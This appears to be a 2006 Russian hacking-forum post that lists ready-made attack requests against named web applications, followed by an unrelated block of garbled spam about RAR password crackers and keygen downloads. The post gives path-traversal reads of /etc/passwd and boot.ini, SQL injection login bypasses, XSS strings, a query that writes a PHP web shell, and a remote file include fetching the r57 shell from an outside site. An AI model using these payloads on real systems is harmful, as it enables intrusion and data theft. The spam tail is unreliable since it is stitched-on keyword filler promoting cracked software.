protection.php?action=logout&siteurl=././././././././././etc/passwd%00
protection.php?action=logout&siteurl=././././././././././boot.ini%00
Techno Dreams Products SQL Injection
admin/login.asp POST userid=%27union+all+select+%271%27%2C%271%27+from+ admin+where+%27%27%3D%27&passwd=1&submit=Login
AlstraSoft Template Seller Pro 3.25 File Inclusion
include/paymentplugins/payment_paypal.php?config[basepath]=inexistent_hacker_box
AlstraSoft Affiliate Network Pro v.7.2 SQL Injection
admin/admin_login_validate.php POST login=%27+or+isnull%281%2F0%29+%2F*&passwd=&B1=Log in
OpenEdit v.4.0 XSS
/store/search/results.html ?page=%3Ciframe%3Exss-${random}%3C/iframe%3E
Электронная коммерция
Zend Cart 1.2.6 SQL Injection
admin/password_forgotten.php POST admin_email=%27UNION+SELECT+0%2C0%2C%27%3C%3Fphp+s ystem%28%24_GET%5Bcmd%5D%29%3B+%3F%3E%27%2C0
+INTO+OUTFILE+%27shell.php%27+FROM+force_table_err or%2F*&submit=resend
Lizard Cart CMS v.1.0.4 SQL Injection
detail.php?id=-1'
My Amazon Store Manager v1.0 XSS
/search.php ?q=%3Cscript%3Ealert('xss-${random}')%3C/script%3E&Mode=apparel
CRE Loaded v.6.15 XSS
/admin/htmlarea/popups/file/files.php?q=%3Cscript%3Ealert('xss-${random}')%3C/
script%3E&Mode=apparel
NZ Ecommerce SQL Injection
/index.php?action=Information&informationID=1%20and %20generate_error=error
Guest Book Applications
Ades Guestbook v.2.0 XSS
read.php ?pageNum_rsRead=1&totalRows_rsRead=%3Cscript%3Eale rt%28%27wvs-xss-magic-string-${random}%27%29%3
C%2Fscript%3E
ph0en1x добавил 07.06.2006 в 03:33
А вот ещё:
Development Tools
Mantis 1.00 File Inclusion
bug_sponsorship_list_view_inc.php?t_core_path=././././././././etc/passwd%00
bug_sponsorship_list_view_inc.php?t_core_path=./././././././././boot.ini%00
Flyspray 0.9.8 XSS
index.php ?tasks=all%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3 C%2Fscript%3E%26project%3D0
Gemini v.2.0 XSS
/issue/createissue.aspx?rtcDescription$RadEditor1=1><scri pt>alert(${random});</script>
Другие инструменты
Digital Scribe 1.4 SQL Injection
login.php POST username=%22+or+isnull%281%2F0%29+%2F*&pass1=&subm it=Login
ATUTOR 1.5.1 SQL Injection
password_reminder.php POST form_password_reminder=true&form_email=%27
PHP Advanced Transfer Manager System локальный include
viewers/txt.php?filename=././././././././././boot.ini%00
viewers/txt.php?filename=././././././././././etc/passwd%00
Chipmunk Topsites XSS
recommend.php ?ID='%3C/a%3E%3CIFRAME%20SRC=javascript:alert(%2527xss%2527 )%3E%3C/IFRAME%3E
Chipmunk Directory XSS
recommend.php ?entryID='%3C/a%3E%3CIFRAME%20SRC=javascript:alert(%2527xss%2527 )%3E%3C/IFRAME%3E
Gcards 1.44 limit parameter SQL Injection
news.php ?limit=force_sql_error
phpSysInfo 2.3 XSS
index.php ?VERSION=%22%3E%3Cscript%3Ealert('FORCE_XSS')%3C/script%3E
Advanced Poll 2.03 XSS
popup.php ?poll_ident=%3Cscript%3Ealert(%22wvs-xss-magic-string-${random}%22)%3C/script%3E
PHPGreetz 0.99 Remote File Include
content.php?content=http://rst.void.ru/download/r57shell.txt
eFiction 1.1 XSS и SQL Injection
titles.php?action=viewlist&let='%20UNION%20SELECT% 200,0,'%3Cscript%3Ealert(%2 2wvs-xss-magic-string-${random}%22)%3C/script%3E',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,pen name,0%20FROM%20fanfiction_authors%20/*
Google API Search Engine v.1.3.1 XSS
index.php?REQ=%3Cscript%3Ealert%28%27wvs-xss-magic-string-${random}%27%29%3C%2Fscript%3ESubmit=Submit
phpArcadeScript v.2.0 XSS
/includes/tellafriend.php?about=game&gamename=%3Cscript%3Eal ert(${random});%3C/script%3E
ph0en1x добавил 07.06.2006 в 03:35
Найдено мною на Античате.
Http //smarturl.it/rar-password Password Reset
Http smarturl it a11gl5 password 100 Mbits Full download! Http smarturl it a11gl5 password + serial-key (rar file) http smarturl it a11gl5 password + keygen/crack (rar archive) Serial Numbers 0 serial numbers found on Smart Serials database. Try to be more specific for better results. Http Smarturl.it Rar Password Password Download Sep 18, 2013 Learn to unlock your password protected RAR files without password. Download the software at For open zip file without password visit. Http Smarturl It Rar Password Download. Loadpost.tistory.com DA: 20 PA: 3 MOZ Rank: 30. Boston market meu. Http Smarturl It Rar Password Download Software; So, viewers, this is the tested and working latest version of Winrar Password Remover 2017 Edition with how to install and crack video using this you can easily unlock the Rar passwords. Password brute-force: games here: you like this video, leave a comment and subscribe!.